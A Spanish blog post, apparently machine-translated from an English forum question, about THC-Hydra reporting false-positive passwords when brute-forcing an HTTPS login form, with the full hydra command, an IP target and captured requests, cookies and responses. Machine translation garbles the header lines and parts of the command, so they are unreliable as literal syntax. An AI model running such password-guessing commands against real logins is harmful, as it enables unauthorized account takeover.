Blog

Problemas con THC-HYDRA dando contraseñas falsas positivas

hydra -L userdummy.txt -P passdummy.txt -vV 104.20.113.15 https-post-form “/website.com/sign-in:email=^USER^&password=^PASS^&login=Log+in+to+your + cuenta: F = incorrecta.: C = _cfduid = de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID = vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO = x; SERVERID = fe03; httpreferer =% 2Fsign-in; ga = GA1.2.1543913319.1536632638; gid = GA1.2.1875996076.1536632638; gat = 1 “

Este es mi comando completo usando la cookie de la solicitud que se enumera a continuación.
POST / inicio de sesión HTTP / 1.1
Anfitrión: sitio web.com
Agente de usuario: Mozilla / 5.0 (X11; Linux x86_64; rv: 52.0) Gecko / 20100101 Firefox / 52.0
Aceptar: texto / html, aplicación / xhtml + xml, aplicación / xml; q = 0.9,/; q = 0,8
Aceptar-Idioma: en-US, en; q = 0.5
Aceptar codificación: gzip, desinflar
Referer: website.com/sign-in

Cookie: _cfduid = de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID = vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO = x; SERVERID = fe03; httpreferer =% 2Fsign-in; ga = GA1.2.1543913319.1536632638; gid = GA1.2.1875996076.1536632638; gat = 1

Conexión: cerrar
Solicitudes de actualización inseguras: 1
Tipo de contenido: application / x-www-form-urlencoded
Longitud del contenido: 61

email = nombre de usuario y contraseña = contraseña e inicio de sesión = Iniciar + sesión + en + su + cuenta

Esta solicitud es una grabación del formulario de solicitud que utiliza un nombre de usuario y una contraseña no válidos. Cuando utilizo una contraseña y un nombre de usuario correctos, lo único que ha cambiado ha sido el final de la cookie “gat = 1 “. No está allí cuando utilizo un nombre de usuario válido y. Intenté usar la cookie desde un inicio de sesión exitoso y cambié” F = “a” S = “en mi comando de llamada de hydra. El resultado es el siguiente : “1 de 1 objetivo completado, 0 contraseñas válidas encontradas”. Y obtengo “1 de 1 objetivo completado con éxito, 24 contraseñas válidas encontradas” como si hydra no estuviera viendo el mensaje de error “correo electrónico o contraseña incorrectos” o la solicitud fallida cookie “_cfduid = de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID = vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO = x; SERVERID = fe03; httpreferer =% 2Fsign-in; ga = GA1.2.1543913319.1536632638; gid = GA1.2.1875996076.1536632638; _gat = 1 “.

Para su información, el comando Hydra se descompone así. hydra (llamando a hydra) -L (usa esta lista de nombre de usuario) userlist.txt. -P (use esta lista de pases) passlist.txt -vV (detallado) 127.0.0.0 (IP del host) https-get-form (método) “x: xxx: xxx (URL del host: correo electrónico / parámetros de paso / mensaje de error o mensaje de éxito / parámetro opcional / parámetro opcional ( cookie o encabezado) “.

He probado varias variantes, incluido el uso del encabezado “200 OK” como parámetro opcional, en combinación y sin combinación con la cookie. Intenté no usar ninguno de los dos, debe haber algo mal con el parámetro de falla, creo que Hydra está luchando para diferenciar un inicio de sesión válido de uno fallido. Por lo tanto, dándome todas las contraseñas válidas o todas fallaron. Esta es una copia del formulario de solicitud con un inicio de sesión válido y una contraseña válida. Como puede ver, gat_1 ha desaparecido de la cookie y debería funcionar para ayudar a Hydra a diferenciarse de una solicitud válida y una solicitud fallida.

POST / inicio de sesión HTTP / 1.1
Anfitrión: sitio web.com
Agente de usuario: Mozilla / 5.0 (X11; Linux x86_64; rv: 52.0) Gecko / 20100101 Firefox / 52.0
Aceptar: texto / html, aplicación / xhtml + xml, aplicación / xml; q = 0.9,/; q = 0,8
Aceptar-Idioma: en-US, en; q = 0.5
Aceptar codificación: gzip, desinflar
Referer: website.com/sign-in

Cookie: _cfduid = de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID = vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO = x; SERVERID = fe03; httpreferer =% 2Fsign-in; ga = GA1.2.1543913319.1536632638; _gid = GA1.2.1875996076.1536632638

Conexión: cerrar
Solicitudes de actualización inseguras: 1
Tipo de contenido: application / x-www-form-urlencoded
Longitud del contenido: 59

email = iforgot & password = iforgot & login = Iniciar + sesión + en + su + cuenta

Esta es la respuesta a esa solicitud válida: HTTP / 1.1 302 Movido temporalmente
Fecha: martes, 11 de septiembre de 2018 02:46:33 GMT
Tipo de contenido: texto / html; juego de caracteres = utf-8
Conexión: cerrar
Caduca: Jue, 19 de noviembre de 1981 08:52:00 GMT
Control de caché: sin almacenamiento, sin caché, debe revalidar, verificación posterior = 0, verificación previa = 0
Pragma: sin caché
Establecer cookie: http_referer =% 2Fsign-in; expira = Mar, 11-Sep-2018 03:46:33 GMT; ruta = /; dominio = .website.com

Set-Cookie: loginkey = 0067aa09e8bc1b2d92dece7acee917cc; expira = Martes, 18 de septiembre de 2018 02:46:33 GMT; ruta = /; dominio = .website.com

Ubicación: /
Variar: aceptar codificación
Expect-CT: max-age = 604800, report-uri = “report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Servidor: cloudflare
CF-RAY: 4586cdfa5b308d1d-PDX
Longitud del contenido: 0uest.

He intentado utilizar la clave de inicio de sesión como cookie para el mensaje de éxito. No funciona.

Conexión: cerrar
Caduca: Jue, 19 de noviembre de 1981 08:52:00 GMT
Control de caché: sin almacenamiento, sin caché, debe revalidar, verificación posterior = 0, verificación previa = 0
Pragma: sin caché
Establecer cookie: http_referer =% 2Fsign-in; expira = martes, 11 de septiembre de 2018 a las 03:24:37 GMT; ruta = /; dominio = .website.com
Set-Cookie: return_url = eliminado; expires = Thu, 01-Jan-1970 00:00:01 GMT
Variar: aceptar codificación
Expect-CT: max-age = 604800, report-uri = “report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Servidor: cloudflare
CF-RAY: 4586add9adba8d23-PDX
Longitud del contenido: 9156

Esta es la respuesta a una solicitud que utiliza una contraseña y un nombre de usuario no válidos. Intenté usar la cookie return_url como parámetro de falla, pero tampoco funciona.

Comencé a revisar el código fuente de hydra para tratar de encontrar una respuesta a mi problema. Aprendí que si te escapas de los dos puntos, hydra no lo contará como un parámetro separado (por ejemplo: Cookie // 🙂 intentado sin éxito. También aprendí que “Set-Cookie” está en el código fuente de hydra y, por lo tanto, debería poder leer Set-Cookie: XXXX como un parámetro válido. Entiendo que en sitios web como este nadie hará el trabajo por ti. Ya que no solo busco una respuesta sencilla, sino más orientación para encontrar la respuesta a mi problema. Gracias al

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar